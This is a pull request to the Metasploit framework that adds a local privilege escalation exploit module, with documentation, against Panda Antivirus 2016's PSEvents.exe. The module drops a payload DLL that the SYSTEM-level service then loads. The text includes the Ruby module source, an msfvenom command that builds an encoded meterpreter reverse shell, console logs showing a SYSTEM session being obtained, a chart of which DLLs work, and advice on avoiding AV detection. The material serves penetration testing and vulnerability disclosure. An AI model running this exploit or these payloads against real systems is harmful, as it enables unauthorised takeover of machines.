### PR TITLE
Panda Antivirus Priv Esc

### DIFF
--- a/documentation/modules/exploit/windows/local/panda_psevents.md
+++ b/documentation/modules/exploit/windows/local/panda_psevents.md
@@ -2,9 +2,12 @@
 
   Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
 
-  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I put in an exclusion for the AV for the folder to ensure it didn't catch meterpreter in action.
+  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
 
-  The downloads folder can take a few minutes to appear after install, you may want to wait an hour or so, but it will eventually appear.
+  The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.
+
+  1. Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
+  2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.
 
 ## Verification Steps
 
@@ -24,7 +27,17 @@
 
   **DLL**
 
-  Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, however I found which dll to be VERY picky.  CRYPTBASE.dll seemed to work the best and is the default.
+  Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used.  However the dll seems to be VERY picky.  Default is cryptnet.dll.  See the chart for more details.
+  
+  |                                           | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
+  |---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
+  | 64bit target (1), win10 x64 | CRASH | CRASH | NO |  NO       | valid     |    no |
+  | 64bit target (1), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid     |    no |
+  | 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO        | valid     |    no |
+  | 32bit target (0), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid (caught by av)     |    no |
+  | 32bit target (0), win7sp1 x86 |  |  | valid |       | valid (caught by av)     |     |
+
+  In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.
   
   **ListenerTimeout**
   
@@ -73,7 +86,7 @@
     
        Name             Current Setting  Required  Description
        ----             ---------------  --------  -----------
-       DLL              CRYPTBASE.dll    yes       dll to create (Accepted: WINHTTP.dll, VERSION.dll, bcryptPrimitives.dll, CRYPTBASE.dll, cryptnet.dll, WININET.dll)
+       DLL              CRYPTBASE.dll    yes       dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
        ListenerTimeout  3610             yes       Number of seconds to wait for the exploit
        SESSION          1                yes       The session to run this module on.
     

--- a/documentation/modules/exploit/windows/local/panda_psevents.md
+++ b/documentation/modules/exploit/windows/local/panda_psevents.md
@@ -29,15 +29,15 @@
 
   Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used.  However the dll seems to be VERY picky.  Default is cryptnet.dll.  See the chart for more details.
   
-  |                                           | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
-  |---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
-  | 64bit target (1), win10 x64 | CRASH | CRASH | NO |  NO       | valid     |    no |
-  | 64bit target (1), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid     |    no |
-  | 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO        | valid     |    no |
-  | 32bit target (0), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid (caught by av)     |    no |
-  | 32bit target (0), win7sp1 x86 |  |  | valid |       | valid (caught by av)     |     |
+|                                           | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
+|---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
+| 64bit target (1), win10 x64 | CRASH | CRASH | NO |  NO       | valid     |    no |
+| 64bit target (1), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid     |    no |
+| 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO        | valid     |    no |
+| 32bit target (0), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid (caught by av)     |    no |
+| 32bit target (0), win7sp1 x86 |  |  | valid |       | valid (caught by av)     |     |
 
-  In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.
+In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.
   
   **ListenerTimeout**
   

--- a/documentation/modules/exploit/windows/local/panda_psevents.md
+++ b/documentation/modules/exploit/windows/local/panda_psevents.md
@@ -38,6 +38,7 @@
   
     msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
     
+    msf > use exploit/multi/handler 
     msf exploit(handler) > set payload windows/meterpreter_reverse_tcp 
     payload => windows/meterpreter_reverse_tcp
     msf exploit(handler) > set lhost 192.168.2.117
@@ -115,3 +116,26 @@
     Logged On Users : 2
     Meterpreter     : x86/win32
     meterpreter > background
+
+## Failed Exploitation Attempts
+
+If the dll doesn't work, PSEvents.exe will fail to run.  While silent to the user, an error will occur in the Application Windows Logs.
+
+ * Event ID: 1000
+ * Task Category (100)
+ * Log Name: Application
+ * Source: Application Error
+ * Details:
+```
+Faulting application name: PSEvents.exe, version: 4.0.0.35, time stamp: 0x57061ba6
+Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
+Exception code: 0xc0000374
+Fault offset: 0x000d0cf2
+Faulting process id: 0xdd0
+Faulting application start time: 0x01d218a30fbf1ac5
+Faulting application path: C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\PSEvents.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
+Faulting package full name: 
+Faulting package-relative application ID:
+```

--- a/documentation/modules/exploit/windows/local/panda_psevents.md
+++ b/documentation/modules/exploit/windows/local/panda_psevents.md
@@ -1,0 +1,117 @@
+## Vulnerable Application
+
+  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
+
+  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I put in an exclusion for the AV for the folder to ensure it didn't catch meterpreter in action.
+
+  The downloads folder can take a few minutes to appear after install, you may want to wait an hour or so, but it will eventually appear.
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the application
+  2. Wait for `C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads` folder to appear
+  3. Start msfconsole
+  4. Get a shell
+  5. Do: `use exploit/windows/local/panda_psevents`
+  6. Do: `set session #`
+  7. Do: `exploit`
+  8. Go do something else while you wait
+  9. Enjoy being system with your shell
+
+## Options
+
+  **DLL**
+
+  Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, however I found which dll to be VERY picky.  CRYPTBASE.dll seemed to work the best and is the default.
+  
+  **ListenerTimeout**
+  
+  How long to wait for a shell.  PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things)
+
+## Scenarios
+
+### Windows 8.1 x86 with Panda Antirivus Pro 2016 16.1.2
+
+  Step 1, get a local shell.  I used msfvenom to drop an exe for easy user level meterpreter.
+  
+    msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
+    
+    msf exploit(handler) > set payload windows/meterpreter_reverse_tcp 
+    payload => windows/meterpreter_reverse_tcp
+    msf exploit(handler) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(handler) > set lport 4449
+    lport => 4449
+    msf exploit(handler) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4449 
+    [*] Starting the payload handler...
+    [*] Meterpreter session 1 opened (192.168.2.117:4449 -> 192.168.2.91:63617) at 2016-09-25 20:32:15 -0400
+    
+    meterpreter > getuid
+    Server username: IE11Win8_1\IEUser
+    meterpreter > background
+    [*] Backgrounding session 1...
+
+  Step 2, drop our panda exploit
+
+    use exploit/windows/local/panda_psevents
+    msf exploit(panda_psevents) > set session 1
+    session => 1
+    msf exploit(panda_psevents) > set payload windows/meterpreter/reverse_tcp
+    payload => windows/meterpreter/reverse_tcp
+    msf exploit(panda_psevents) > set exitfunc seh
+    exitfunc => seh
+    msf exploit(panda_psevents) > set DLL CRYPTBASE.dll
+    DLL => CRYPTBASE.dll
+    msf exploit(panda_psevents) > show options
+    
+    Module options (exploit/windows/local/panda_psevents):
+    
+       Name             Current Setting  Required  Description
+       ----             ---------------  --------  -----------
+       DLL              CRYPTBASE.dll    yes       dll to create (Accepted: WINHTTP.dll, VERSION.dll, bcryptPrimitives.dll, CRYPTBASE.dll, cryptnet.dll, WININET.dll)
+       ListenerTimeout  3610             yes       Number of seconds to wait for the exploit
+       SESSION          1                yes       The session to run this module on.
+    
+    
+    Payload options (windows/meterpreter/reverse_tcp):
+    
+       Name      Current Setting  Required  Description
+       ----      ---------------  --------  -----------
+       EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
+       LHOST     192.168.2.117    yes       The listen address
+       LPORT     4450             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Windows x86
+    
+    
+    
+    msf exploit(panda_psevents) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4450 
+    [*] Uploading the Payload DLL to the filesystem...
+    [*] Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...
+    [*] Start Time: 2016-09-27 18:10:21 -0400
+    [*] Sending stage (957999 bytes) to 192.168.2.91
+    [*] Meterpreter session 2 opened (192.168.2.117:4450 -> 192.168.2.91:50022) at 2016-09-27 18:46:15 -0400
+    [+] Deleted C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\CRYPTBASE.dll
+    
+    meterpreter > getuid
+    Server username: NT AUTHORITY\SYSTEM
+    meterpreter > sysinfo
+    Computer        : IE11WIN8_1
+    OS              : Windows 8.1 (Build 9600).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/win32
+    meterpreter > background

--- a/modules/exploits/windows/local/panda_psevents.rb
+++ b/modules/exploits/windows/local/panda_psevents.rb
@@ -53,8 +53,8 @@ class MetasploitModule < Msf::Exploit::Local
     ))
     register_options(
       [
-        OptEnum.new('DLL', [ true, 'dll to create', 'CRYPTBASE.dll',
-                             ['WINHTTP.dll', 'VERSION.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll', 'cryptnet.dll', 'WININET.dll']]),
+        OptEnum.new('DLL', [ true, 'dll to create', 'cryptnet.dll',
+                             ['cryptnet.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll']]),
         OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]),
       ], self.class)
   end
@@ -62,18 +62,18 @@ class MetasploitModule < Msf::Exploit::Local
   def get_path()
     case sysinfo['OS']
     when /Windows (7|8|10|2012|2008)/
-      return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+      return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
     when /Windows (NT|XP)/
-      return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+      return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
     end
   end
 
   def check
-    directory
-    if directory(get_path())
+    if directory?(get_path())
       print_good('Vuln path exists')
       CheckCode::Appears
     else
+      vprint_error("#{get_path()} doesn't exist on target")
       CheckCode::Safe
     end
   end
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_status("OS Detected as: #{sysinfo['OS']}")
 
     payload_filepath = get_path()
-    payload_filepath = "#{payload_filepath}#{datastore['DLL']}"
+    payload_filepath = "#{payload_filepath}\\#{datastore['DLL']}"
     upload_payload_dll(payload_filepath)
 
     # start the hour wait

--- a/modules/exploits/windows/local/panda_psevents.rb
+++ b/modules/exploits/windows/local/panda_psevents.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::EXE
+  include Exploit::FileDropper
+  include Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Panda Security PSEvents Privilege Escalation',
+      'Description'   => %q{
+        PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.
+        When run, it checks a user writable folder for certain DLL files, and if any are found
+        they are automatically run.
+        Vulnerable Products:
+        Panda Global Protection 2016 (<=16.1.2)
+        Panda Antivirus Pro 2016 (<=16.1.2)
+        Panda Small Busines Protetion (<=16.1.2)
+        Panda Internet Security 2016 (<=16.1.2)
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          "h00die <mike@stcyrsecurity.com>", # Module,
+          'Security-Assessment.com' # discovery
+        ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets'       => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' => {
+        'payload' => 'windows/meterpreter/reverse_tcp',
+        'exitfunc' => 'seh'
+      },
+      'References'    => [
+        [
+          'EDB', '40020',
+          'URL', 'http://www.security-assessment.com/files/documents/advisory/Panda%20Security%20-%20Privilege%20Escalation.pdf',
+          'URL', 'http://www.pandasecurity.com/uk/support/card?id=100053'
+        ]
+      ],
+      'DisclosureDate'=> 'Jun 27 2016'
+    ))
+    register_options(
+      [
+        OptEnum.new('DLL', [ true, 'dll to create', 'CRYPTBASE.dll',
+                             ['WINHTTP.dll', 'VERSION.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll', 'cryptnet.dll', 'WININET.dll']]),
+        OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]),
+      ], self.class)
+  end
+
+  def get_path()
+    case sysinfo['OS']
+    when /Windows (7|8|10|2012|2008)/
+      return 'C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+    when /Windows (NT|XP)/
+      return 'C:\\Documents and Settings\\All Users\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+    end
+  end
+
+  def check
+    directory
+    if directory(get_path())
+      print_good('Vuln path exists')
+      CheckCode::Appears
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    vprint_status(sysinfo['OS'])
+
+    payload_filepath = get_path()
+    payload_filepath = "#{payload_filepath}#{datastore['DLL']}"
+    upload_payload_dll(payload_filepath)
+
+    # start the hour wait
+    stime = Time.now.to_f
+    print_status 'Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...'
+    print_status "Start Time: #{Time.now.to_s}"
+    until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
+      Rex.sleep(1)
+    end
+  end
+
+  def upload_payload_dll(payload_filepath)
+    payload = generate_payload_dll()
+    print_status('Uploading the Payload DLL to the filesystem...')
+    begin
+      vprint_status("Payload DLL #{payload.length} bytes long being uploaded..")
+      write_file(payload_filepath, payload)
+      register_file_for_cleanup(payload_filepath)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")
+    end
+  end
+end

--- a/modules/exploits/windows/local/panda_psevents.rb
+++ b/modules/exploits/windows/local/panda_psevents.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Local
       },
       'License'       => MSF_LICENSE,
       'Author'        => [
-          "h00die <mike@stcyrsecurity.com>", # Module,
+          "h00die <mike@shorebreaksecurity.com>", # Module,
           'Security-Assessment.com' # discovery
         ],
       'Platform'      => [ 'win' ],
@@ -62,9 +62,9 @@ class MetasploitModule < Msf::Exploit::Local
   def get_path()
     case sysinfo['OS']
     when /Windows (7|8|10|2012|2008)/
-      return 'C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+      return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
     when /Windows (NT|XP)/
-      return 'C:\\Documents and Settings\\All Users\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+      return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
     end
   end
 
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    vprint_status(sysinfo['OS'])
+    vprint_status("OS Detected as: #{sysinfo['OS']}")
 
     payload_filepath = get_path()
     payload_filepath = "#{payload_filepath}#{datastore['DLL']}"


### PR DESCRIPTION
Adds Windows priv escalation for Panda Antivirus.
## Verification
- [x] Install Panda Antivirus Pro 2016 via links provided in markdown.  Confirm the Downloads folder is created (can take a little time for Panda to create it, maybe an hour?)  `check` can confirm.
- [x] Start `msfconsole`
- [x] get user shell on box
- [x] Do: `use exploit/windows/local/panda_psevents`
- [x] Do: `set session #`
- [x] Do: `check`
- [x] Do: `exploit`
- [x] Go do something else while you wait up to an hour
- [x] Enjoy being system with your shell

Panda caught my meterpreter, so I added an exclusion for the downloads folder.  Depending how crafty you are you may or may not need to do this as well
